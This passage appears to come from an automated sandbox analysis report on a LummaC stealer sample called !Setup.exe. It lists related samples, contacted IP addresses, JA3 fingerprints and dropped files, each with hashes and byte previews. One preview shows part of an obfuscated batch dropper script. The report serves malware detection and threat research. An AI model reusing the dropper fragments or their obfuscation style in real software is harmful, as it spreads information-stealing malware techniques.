	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	test5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	104.21.34.5
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16
	SQHE4Hsjo6.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16
	XYQ1pqHNiT.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16
	GHXsFkoroU.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	104.21.37.209 104.26.3.16

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SgMuuLxOCJ.exe, Detection: malicious, Browse Filename: TNyOrM6mIM.exe, Detection: malicious, Browse Filename: j2nLC29vCy.exe, Detection: malicious, Browse Filename: es5qBEFupj.exe, Detection: malicious, Browse Filename: vUcZzNWkKc.exe, Detection: malicious, Browse Filename: CLaYpUL3zw.exe, Detection: malicious, Browse Filename: BagsThroat.exe, Detection: malicious, Browse Filename: installer_1.05_36.4.exe, Detection: malicious, Browse Filename: SoftWare(1).exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\V

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	496248
Entropy (8bit):	7.999666539358623
Encrypted:	true
SSDEEP:	12288:PuuYPnblMBGjgrSn6caD4u0H2LKwAacxs8C4A9a44PknfCt9xK:GzPOt1caHq2SxVq94Pkf8K
MD5:	11A18CA5A4EC415EE2E991A8A2EFA60A
SHA1:	AD7F7F4763644158A7D1DC22A25D7FA3600AC91F
SHA-256:	44A0272003274F673664E9EAC14FAE1BFC04DEBE7CB58A86A75E7C8D08033F20
SHA-512:	EF4C89749A69680DD5476AADAB0F0A56F5530B0EDA13CB5C432BF608084F48D6968586AD8DB954A860A55C973C466E1DDE3157CEDD49BD47044368DEC750E2C6
Malicious:	false
Preview:	.az$Q..brYk..c\..5.1..#.h...;.o...L......o...ho...+?.>.....t...M..1.H1.9d.pi.....HtD...D....6...mr.6..>...7..(@.b.u..~EV...5.X..?B.}..5Q.V......AX..c...}..e..^.S...J.N?..'&H6..r.......,.v.>....(K...p....5..XJ.]...6...o#./.....r./..1.p.. awJ..[:.P....`..X.=A....$}...s%.v..8..T........7..P...s.l7....V.."g...6Rx....).......V.e.)d...RRg`.:..T..j`DE.B'........NI'....G.E........8...y.=...~.^(.f..B...i.y.@.......y......].j.h....c..l1u..s..Rq...T<.].....g{.,sHq.s.Gb.....=.D...W..y..]..].G.L........f".8wF..$....(.I.I..\.1..u.........%....u..$.Ju.............q...Ad......B...S....Nw..e6z.~.z........".U...5...f..9.L./..la.P >z.B........0T..-.....B.3H. .y..Nd)/.n%...._ue...#0...\|...0fg3..v.oX...^..%Tv...@}V.....\|g...M.k.T._(....\..WXR...%....hO.....h.(.:!........\|..$....(..Q....y......0!l.j...V.Q....:..\+.&sU.q.R..l....>..~ .....t\.n.4s._...Z.,..1... ......y......K.8~...E.c>R.^z.@S..5...D.;...Q.........QY.v.....1.e....w..'.....-...(...Rn_..i

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Access

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	7.997218193561625
Encrypted:	true
SSDEEP:	1536:Bw4nxRC6h9dFUbZ+MsTogIPlC8aeu67NoURZDNMcI:HnxRpEbdWoxs8puuCaZD0
MD5:	CFCFA68F88E27612AB83EA57018A850C
SHA1:	B403391DD50F8F6DD090E7E0319B611D9BBD2874
SHA-256:	C6A15A8FA80F99E5F34775677B74082A0946FCF2F10AD3827691059821F034F7
SHA-512:	3B361BAF0F93B2F956BAB4EDB48E03A2AB06F2B61583E2A0D023B25C5D5E41A14074E2B7D007672CB63A8E44F25763649C847F338119B9E5FF203ED27AE98248
Malicious:	false
Preview:	..l?.G..d.SB.....E..v.Z._..d$t......'F..G8e...m..Ol.(.L~3[.....n..N...x.(;..W...t.........\|..(a.>2.Y........,.C6..L..i&FN...%w%_.s.A....^.4..^..:a../..D>.. .`..#.......#N.,%A..-.{..&.......\v...??.b.f.EGf...$};r.o d@.6[....i...n6.k~.}O....KL.I[.=...H.tijY.I.`/...:j.j.7.....{.7.....@WQ......:....\|..... ....L.....~-^.M..(......_hcwW...r.......E.U(...e.&.H.....7...a{Y...U+\|^.zH..1p..G.w...i]...6}...8.eB.E..x.O..K<........J;K"D.^..cA........n...4..,..tC..1...Q.e.D.9.........k...H...&FeT..5Xd.p..".0..u.?....2t.%../. ..'A$.1...`....S(..P.>.....-...-7...<.*..2.7;.GyJy..K...L..0.j._b...-iv..Px<5y4(.DEt....u!.b>.)......%G{..}.~...lZ...a....e.nb.... w..nZ.4..NB.g."..`..Z.<)..Y..s..._.&..no. ..f4>.'....XO...QKo#&...'......%..Y.;.&....d.S'..'..#.5b.....Q..q.~.7.O.]...Ynk...>..X.[.P..J....g.....f..n.t.z...R.......9ZD.T....,..V.K.w....A.}1...t....c.8W..8.CC-....r....}....Nd.]7.2..v......... /...ZP.STM;..aT[...^....gP%.aE.h..'.=&.)u..&.=...3.hjq

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Availability

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	71680
Entropy (8bit):	7.9976781651176445
Encrypted:	true
SSDEEP:	1536:cqVGA8XmJWQDjDhD3rvvbIRdb5gOY4kb+HUjnhM//6AiaPynUZTPb2RZU:c+X8XCdDjVD37v0RwOY4kiWnhM36iPSy
MD5:	32795C14E61648316037781CC1BA12C5
SHA1:	4CA7E78E840E12EE1EC390C3996E1C75EFC5A248
SHA-256:	9E938A13061086921E0961EF7D2F0A89A6B2B33E9D21A1EEC0198D878DF4E536
SHA-512:	3A526AE9C35EE67F5AE951CEB927B8B2CE61EA4B03BEB5ECB941353CE6343A007857160DB689587EC34F712E7C9BC06918454DE73E3792F1F75CB671174BA35E
Malicious:	false
Preview:	l[u.....W.r:3..T...N_.......1..e.O..M....u..Pp.^>...1:.gJC.=...g..C..C.@Y"w)0..aCq.dO.K.h.X4:....r...q......}.{o...p.....n..Z0.d#1.[.........P.n.1.\!W.....;.%.fz9j.2E....6{....G...'X.......=....a.\..t....C.i>=..,...<@\$....[=Qp.c...6._.e......K.......hCS......1..J.q4.MJC...K..-P.LN.C..(.[o......t:G.....S.!...^B..P.=.u_..".oim..'a^X..FYjq..)......'...W"...h...^..XvE.g...C.....W..`.>.......P#..o-m[..}M......g..g..B.-.wS..M)s.....a..(..R..!.06.\|N0...P.p.d.iP..0....g.J.B%e.)......d.d...~....2.......k.....J4H?........]..].G.y.WS!......3..)yw...\|...T.-..&.q....?..OKk9"......Q@.qN..ZP...h.}..=... ...K.c.7.2Q.@.a....'...24.p.. ....m.T....."..L.{v..A. ....Z..@...G.....S......B.\|.._4....Y.O.I..+/..^w.{.%..`.?......P..e......~.S....*.....{,..EQ..yA...-~...E.U^.($!"..!g...r.>....k...&..:T..._..~..Y.TQ.k'..$...g.W."~..qZ....T3...`...e..._...E.J%.'...T../&.2.L..WU........ I..]........l.......5.N0....g_...7.l.0..#...1...\.Z.k%th_.;.Y.....77..&.M...x..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Available

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	6.652049318870944
Encrypted:	false
SSDEEP:	1536:QUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoU:Xnj0nEoXnmowS2u5hVOoU
MD5:	64ACFD91F0FC989008A694B9F199A57B
SHA1:	8E4E37288AC01A2F48FDF059A0CFC5135C935C17
SHA-256:	6B0C1BB5546B6682CCE559D06DCA34D43A5208C30CEB0DCC18014E45F844E4B8
SHA-512:	02ADE9009A4D732A82E3708374A4CD80319DD6F19AF67841D8246EA7BDD7BA6BEFDE911B9DA8BE9AC9929D12DE4EB8ED69AC965FC795293449E4545281A7F30D
Malicious:	false
Preview:	.....#....u..=L.I...M.Q.Q...B.M......Y........9].].tE.E..t>3...t8.E.PV.u.....I..........M...A.PQj.j.S..x.I.........F;u.r..u...p.Vj...t.I.P..p.I....}.........u..G.f.w.P.u...L.I.P..P.I...tl.u..e......F....F..G....G...G.PWj.j.S..x.I...t=.E....@.E....r.u.j.Sj.V..\|.I...t.V.E.P.u.....I...t..E.....].u..}...=x.I.t..u.j...t.I.P...t.Vj...t.I.P...t.Sj...t.I.P..E..t.Pj...t.I.P..E._^[....U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].SVW..3.j.[._..w......G.3..........Q....Y..9w.v......P.M....F;w.r.._^[...V..~..t.3.PPP.v.P.v...0.I.j..v......YY.v...`.I..6.B...Y^.U..QSV.u....M...WVj..1.E.SP....I.....u7..0.I...zu*.6j...t.I.P..p.I..M.....t.V.6PS.u.....I....._^...[..SVW...Sj.3...t.I.P..p.I.....t.j.SP..,.I....._^...[.U..VW.u...3.j...t.I.P..p.I.....t.j.P..(.I....._...^].U....SQQ.M......M.......t..z.....t.....2.M........[..U...dSVWQQ.M..`...Q.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Balanced

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	143360
Entropy (8bit):	6.659217298088009
Encrypted:	false
SSDEEP:	3072:h0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNP:IbfSCOMVIPPL/sZ7HS3zcNP
MD5:	89B5A26508E16E2564552AE664E91B66
SHA1:	9851FFCBE0015AA2210070E84D7058EA73EC84E4
SHA-256:	EAAF46C77B4F4F937A620D807D58D60882A0310978DBFFC32D469CB025DD45E1
SHA-512:	B5D1CCCC6C632D0138AAE3A6058BEBDDE6811F5CFCA986E36E790F690C7630E7B257E8C6680CE0A7A6A52D3C18CF395634BE5A96B66BE46C9A6A55BB1D35EF91
Malicious:	false
Preview:	..1...Y..x.=....s.... GJ.].3.]..U..U.V..u.....j.^.0.C.........}..v.M......~.....3.@9E.w..l...j"..u...t.S.Z...W.~...0..~.....t.G...0..@I....Z......x..?5\|.....0H.89t....:1u..F.....q...A..u.+.A.PSR.EB....._3.[^]..V..V..,.......Y<.u..F....V.R,..Y.F....^..U...d......L.3.E.S.]...l...VW.}..................u.3...........-u...............3.._....}.u"..........u.......h.gJ..`........E.P.\X..Y..t........A.....................................z....E.........\|....@.}..u..E........................%.......u...3...2.....3.................3............@...............+..QQ..$....YY..:........=....t.=....u.3.........0...3....4......C..,..................j.^...............;.......3.......;..0...............u.....3........j Y+......3....@..............6.........H...............t.A..3.j X+..V.9................s...........su...t.....2.................jrY;.r..........................0.........+.........;.rm;.s..8..3..F.;.s........@...3.#.....#.........................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bids

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	7.997169431224249
Encrypted:	true
SSDEEP:	1536:oSpmDzqM+54CRjeXU/4xbDjuNUAZy5NH+VOxI4+sdW1g:oSazq54CGUYbD6NXM5NegS45ig
MD5:	464B43F4D2DF8DF1A0D420A378B13284
SHA1:	0C90A0656812B3EF827D920195C5C36841AE17AE
SHA-256:	F0E44F93299CCE792814297DC2A34082B057FFCFBD7320C32B16598367A115E8
SHA-512:	2D07B7C972873D397A9E4A16478C73C864F9C82D86D8EE8EE820BDED709CA3EE6B2C1E709DB52B01A131ED0BFF4881BC922D0BCFDEA512EE02D8A0513E7F1E26
Malicious:	false
Preview:	.az$Q..brYk..c\..5.1..#.h...;.o...L......o...ho...+?.>.....t...M..1.H1.9d.pi.....HtD...D....6...mr.6..>...7..(@.b.u..~EV...5.X..?B.}..5Q.V......AX..c...}..e..^.S...J.N?..'&H6..r.......,.v.>....(K...p....5..XJ.]...6...o#./.....r./..1.p.. awJ..[:.P....`..X.=A....$}...s%.v..8..T........7..P...s.l7....V.."g...6Rx....).......V.e.)d...RRg`.:..T..j`DE.B'........NI'....G.E........8...y.=...~.^(.f..B...i.y.@.......y......].j.h....c..l1u..s..Rq...T<.].....g{.,sHq.s.Gb.....=.D...W..y..]..].G.L........f".8wF..$....(.I.I..\.1..u.........%....u..$.Ju.............q...Ad......B...S....Nw..e6z.~.z........".U...5...f..9.L./..la.P >z.B........0T..-.....B.3H. .y..Nd)/.n%...._ue...#0...\|...0fg3..v.oX...^..%Tv...@}V.....\|g...M.k.T._(....\..WXR...%....hO.....h.(.:!........\|..$....(..Q....y......0!l.j...V.Q....:..\+.&sU.q.R..l....>..~ .....t\.n.4s._...Z.,..1... ......y......K.8~...E.c>R.^z.@S..5...D.;...Q.........QY.v.....1.e....w..'.....-...(...Rn_..i

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Campaigns

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	ASCII text, with very long lines (1359), with CRLF line terminators
Category:	dropped
Size (bytes):	22954
Entropy (8bit):	5.07401746558717
Encrypted:	false
SSDEEP:	384:aGf05c6NMXKObw2tlbZqfiqViJYS94QBvO51PKmPb3i32jRsHEWF4Yh:aMpKObhl1qKm0p9rPmG2KFV
MD5:	2E7B0022580A56F4A6645D751E977BC1
SHA1:	5F9942E6359BFEA8EA1407F69DFED3C308551238
SHA-256:	3D616D0119732BF2780AF373845A9F8F1C50AED7CEA51D54E0E790FFEC75280E
SHA-512:	8887FE072570E5EDF9987F4FA01B115322D0BE0F7D3265911C91CF3DECC8370DF79BC5E09F5AA30E749A8299B313C1C3B4F7F79647C82D55B218D7171961CDAE
Malicious:	false
Preview:	Set Korean=c..ufDetermined-Capabilities-Mechanics-Tim-Cruise-..qcVTopless-Clinical-Erp-Handled-Barn-Tub-..pqEaster-Convenience-..LjlvAdventures-Competitors-Unions-Sl-..vLAccording-Ben-Lean-Avg-Lyric-Completely-Urls-..QCTrap-Simulation-Download-Intelligent-Upgrades-Bunny-Bond-Citizen-..oRAlerts-Came-Necessity-Grateful-Raises-Opponents-Belgium-..TJsVPlaced-Unusual-Personals-Blind-Disks-Urban-Terrible-Precious-Funding-..Set Combined=G..ekvLDescriptions-Cet-Continent-House-Booty-..LMfgTit-Therapeutic-Airline-William-Fiscal-..vzSgReceipt-Ho-..tLCattle-Receipt-Appearance-Retention-Involve-Breeds-Fragrances-Bookings-Al-..YAmvStuck-..Set Laura=t..GUxGc-Recruiting-Switch-Impact-Briefs-Sticks-Radius-Selection-..PZpCombinations-Cialis-Allocation-Camera-Periods-Wt-Words-..xCyRequested-Harmony-Reasonably-Supply-Boy-Political-Lucia-..oseTGray-..BeeFEva-..fJFarmer-Vp-Toilet-Hair-Complications-Writes-Compete-..IabZFlooring-Brussels-Indonesian-Deluxe-Millennium-Spending-Bradford-Child-Beds-..pbFavourit

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Campaigns.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1359), with CRLF line terminators
Category:	dropped
Size (bytes):	22954
Entropy (8bit):	5.07401746558717
Encrypted:	false
SSDEEP:	384:aGf05c6NMXKObw2tlbZqfiqViJYS94QBvO51PKmPb3i32jRsHEWF4Yh:aMpKObhl1qKm0p9rPmG2KFV
MD5:	2E7B0022580A56F4A6645D751E977BC1
SHA1:	5F9942E6359BFEA8EA1407F69DFED3C308551238
SHA-256:	3D616D0119732BF2780AF373845A9F8F1C50AED7CEA51D54E0E790FFEC75280E
SHA-512:	8887FE072570E5EDF9987F4FA01B115322D0BE0F7D3265911C91CF3DECC8370DF79BC5E09F5AA30E749A8299B313C1C3B4F7F79647C82D55B218D7171961CDAE
Malicious:	false
Preview:	Set Korean=c..ufDetermined-Capabilities-Mechanics-Tim-Cruise-..qcVTopless-Clinical-Erp-Handled-Barn-Tub-..pqEaster-Convenience-..LjlvAdventures-Competitors-Unions-Sl-..vLAccording-Ben-Lean-Avg-Lyric-Completely-Urls-..QCTrap-Simulation-Download-Intelligent-Upgrades-Bunny-Bond-Citizen-..oRAlerts-Came-Necessity-Grateful-Raises-Opponents-Belgium-..TJsVPlaced-Unusual-Personals-Blind-Disks-Urban-Terrible-Precious-Funding-..Set Combined=G..ekvLDescriptions-Cet-Continent-House-Booty-..LMfgTit-Therapeutic-Airline-William-Fiscal-..vzSgReceipt-Ho-..tLCattle-Receipt-Appearance-Retention-Involve-Breeds-Fragrances-Bookings-Al-..YAmvStuck-..Set Laura=t..GUxGc-Recruiting-Switch-Impact-Briefs-Sticks-Radius-Selection-..PZpCombinations-Cialis-Allocation-Camera-Periods-Wt-Words-..xCyRequested-Harmony-Reasonably-Supply-Boy-Political-Lucia-..oseTGray-..BeeFEva-..fJFarmer-Vp-Toilet-Hair-Complications-Writes-Compete-..IabZFlooring-Brussels-Indonesian-Deluxe-Millennium-Spending-Bradford-Child-Beds-..pbFavourit

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ceo

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.996488555959393
Encrypted:	true
SSDEEP:	768:tJd3kcvzRbRlQP1WfW3xYgUdShSaLH4MyeoZGZkM1jufMxT6dZrdJ3:XRPq1WfoJ0abByT2ksjKQT6dZrdV
MD5:	7D627757A86D54CD1B6C057A7DBFCF26
SHA1:	3A73D88A63ED284DDD76305A4D91DEB9275C4C39
SHA-256:	3AAF7017767A1A1FBB1D9A80FA2C5B3C05583D879BE0A0E2F32898076A4D3BA7
SHA-512:	4B43BAB09367F06C762E2BC60ED3452E05C7001B83198C6732BB68C146DECBE6C837891F597092DFE00565B895933ED94EB665AAC6A1CD4A49E9E26EED65986F
Malicious:	false
Preview:	..Y.Jj.8\.. K2..%....f.OP_.3.Yl..d.[....._............L..x..7a5oc@.3..UX=.v. ....R.v.......x..........\.A.)U@...T.l...l..>...n../V.(L...q?.Q".4.6\|D...I.\.yL..i.q...h....!..,..?p.....yR.... ..&.b..g..L..IpC..u.."....9..=.-\|...B1.).$...6.H'....?_7...dkQ.W......1....mps..Vp.D4U.T.....c.B.bH[!.\...!..!}.o.d..l3).......t....W.qc.I..(v....o.b.._r.k#,..).....B@K%.x......hL..w.~....Oo..U5...'...I.@...Qm.......$..I......A..Z.j#..h>6T....cX.`qUB8..<2......Zq1....TG....Fh.=T)).~....]J.......A.G.w}W.&T9..Z@.~.....G.$..........g8........q.p........>..P.....Tv@...g..53.........@...z........\|.C&;...S...e.G\u.F..w.fB\|.@;O.....6....A...f......+....P.-..i..ey..bi...c`zV..0.......qo!.q..i..{AU...5..l.`..G.?>r8:..]..R&..,.ZR3F..0.....C}...\...R........t..Oc...V....'`.n8......h.X.`.D..AU..E.P...tP.....&?.e./I.Q....M~.....{K..PD%.u..M]l.;w.....j...W.22..0.n..rl..v.T.....#.m....{...o8..}.D1...a.......2..5..V.)r.v'wl..F...k..@)..u...m....d..$.....qV8.hg..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Designed

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	6.679021710164866
Encrypted:	false
SSDEEP:	1536:S64qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CxiL:J4qv+32eOyKODOSpQSAU4CI
MD5:	7D1725A7C164AD387FBA5007E60E47A7
SHA1:	C4253D862DFDBDB7EAE80F88E5487487E72C9AD4
SHA-256:	03CDD5BDCB6EBCB6CFDB7D5C3A038C1BEACA34FC9C8FBB717BC85F31BBDB797A
SHA-512:	7368DF3D1AF7DE8CA3074ABCE8AB02C6DCD309F9B6818C6ACD4AEBB72985B64253AC66A74E424FDC317CF1B07108616C4636826393707109E2377B4586BEA4DE
Malicious:	false
Preview:	8M.........]..U...,......L.3.E..M.3.SVW8A..}..........H......................y.3.G...;.r......W..........+.+...............3.......3.......3..,...............;.u....k..............7.................3.3....;...0..........0......F..;.u.......,.....tL..ss....0.....,...@..,....1...............,....j.P..0...h....P.("....,..........................3..t.3....0.....B....,.........;.u..tZ..ss....0.....,...C........,....?...............,....j.P..0...h....P.!....,..........................3.3............k....AG............;.................3.j.Y.......................&v.j&X....N!J...4.O!J............W..1............j.P.t.......P..........L!J....H.J.P........P.o_........3.A...;...............u.3.........,...P..........;.u.........t.3.3......0........0......G..;.u..tO..,.....ss....0.....,...C..,....43............SP..0.....,...h....P.. ...../.....,......+...;.........0..........,......P......P..0...SP........3...u.P........,.........PS.......,...@......;...............3.3......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dir

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	119808
Entropy (8bit):	6.588797342871174
Encrypted:	false
SSDEEP:	3072:N7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOm:56AUkB0CThp6vmVnjphfhnS
MD5:	CE605A59DE6379BA8DFAB762376A82DB
SHA1:	0E8D74F537E58AD09E08FB0AF0C2151FD91B953C
SHA-256:	81B6C9D8C798EEB2254ADE6E6A562C55F150198F97B25E550E4740594B679499
SHA-512:	1DBC8184FFC8B5B90F6DEB2BF002364AECDDD779079A349EA875C73AC14BB63A482E23B7E2D201251CFF220081C0D1D069C826E638E9DA0EACCEEC723B867888
Malicious:	false
Preview:	....t.3.PPPhLyL...3.f9.t-3.WWW.u....u.WWW..t.hhyL...WWWhLyL...h.yL...M......_^[..U....SV..M.W.^.S....3...t1W...lq...O..M.f.8.t.W...Xq...M....P......M...;.r.E.;.t.P.......M..f..._^[..U..QQVW3...WWj.V....I..E.Ph....j.WWj.V..X.I...u+.E.PV..h.I..u.Wh........I...WV....I.V..`.I._^..U..SVW..3.3.9W.v3.]....3.f..t......P.E....f9E.t.A...Kf..u....BF;w.r..._^[].......U..QSVW.....tW...u.W....Y.p.3.PPVWj.P....I....t33..j.Z;.\|............Q.D...YSPVWj.j..E.....I..E...3._^[..U...(SVWj..M..}.Y.. K....j0Xjxf..}.f..Xf.C..W...x1.}..r..4....:...........f.DE.f.F.f.DM.f...v.y.}.3.f.D.._^[..U....SV..3.W.}...U.C..7.w....wA3.u.A.M...~0.u......QRP.*.....M..W.F.E..U.........E..M.;.\|....2._^[..U....S.].VW....W..P.I.f.>...Y...V.\|V..Y.....I....}........j..E.VP.....3.f.E..E.P.o...4^f.....V.>V........rhj..E.VP....3.f.E..E.P.o..f.G...]......V..V........r2j..E.VP.\|...3.f.E..E.P.So.....f.G.V..U.......t..4^V..U..Y.........j..E.VP.:...3.f.E..E.P..o...4^f.G......]....V.U........rWj..E.VP.....3.f.E..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ec

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	Microsoft Cabinet archive data, 488845 bytes, 11 files, at 0x2c +A "Fwd" +A "Designed", ID 6536, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488845
Entropy (8bit):	7.998691987840986
Encrypted:	true
SSDEEP:	12288:XwvCK7QeZkkSjho8hd9kv+25MbW92VDfG4448L29:XEyBW8Nkv35MSYVTxPwA
MD5:	AFA0F6F9328F080270E89AFFF0581506
SHA1:	1C607C64FCA1CDB4E75DBFF2788F7C3B09D21EA6
SHA-256:	40E274B995FF6326EB0F89943CF999743AE9BDA9F314B3D775F62EC71A5F51C2
SHA-512:	1BE681C4CBA19297FA8D4C7339BD6C7F9E76098AFAC72B9283739DEC20B1A1F1444C71AD94BD29654E20E2CB788189969357CF9FF4284EBCB2A5958BCF166274
Malicious:	false
Preview:	MSCF.....u......,...................(..................Y(. .Fwd..8.........Y(. .Designed..0.........Y(. .Balanced............Y(. .Dir............Y(. .Writing............Y(. .Rise..4.........Y(. .Soccer......,.....Y(. .Returning.....]0.....Y(. .Available.....]......Y(. .Ford.....]......Y(. .Race..h...T..CK..\TU..~...U..`TX.c.j-9Z.h.2....2#)...4...$m".Q..Q{...2.]..u.M..@\.r..-.+.l.C....h..>.s..}.......=....9.<..u.sF......$. U=p].$.oMRYK.j..Kq....TU...0.......L8J..b......C);.lER1..1..........F...B....H..%4...j....!.o0a..p...c7&,...3f.....d{.S..Z.{......(Z...H.#.1.._.0g.s.3.`.^mp..1.RY.......d^.&~.(I.U.L.'...PRL..!i...Y."J....$..$..&..q#%.k..x.,...>\|......H..T..E........}z.W...&.~.$.......;y..Ez.KR..2....T...-9._.....T.M^m.bR7R..._..n>...xa.$...'.$aU1..y.....@..,.....?m....*...zdA&.....uV.Ka.4..`>...{I.!.d......[M.7..r.k>s..k.s-f.......$.....A;l_=..}.%...R\|l..p.@.......U.Y..)xZ..Ru{...?....G.>...`.VR.......AX.!D.z..CX.6.....g)\|..(\|.........C8z....vA..[.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ford

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	117760
Entropy (8bit):	5.977012621747547
Encrypted:	false
SSDEEP:	1536:OxjgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ22:OxjgarB/5elDWy4ZNoGmROL7F1G7ho22
MD5:	D036147EA7B09A642723D8811105937D
SHA1:	276CC8C1DDA5D55F549E053522F95CEE037F6B9D
SHA-256:	DC830AFFB9D9B2E23293BEDA376AD0BDA96CDFF3670CD10ACD131FDCC795855E
SHA-512:	B23E9E6A86720D1E37399916F66A13612CA570884D84F89383563E30479C37F6D48FB0859220F027E68A29D568B5AF78360112C06EE89BA347145E9AB48F3CF5
Malicious:	false
Preview:	..F...N...d...z....................................".......:...N...h...x.................................... ...4...P...b...t.........................n..................>...T...p....................................(...@...P...^...t................................&...B...`............................. ...8...J...\...r..................................."......@...N...Z...n............................V...J...:..............................................................<...V...l...x...........................................(...2...D...V...f...x....................................... ...2...D...^...x..................x...^...H...2....... ...........................................'...........%...).......................................M...&...........................................h...R...>...(....................................... ...6...F...V...h...v....................................,...:...J...V...b...v.......................................*.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fwd

Download File

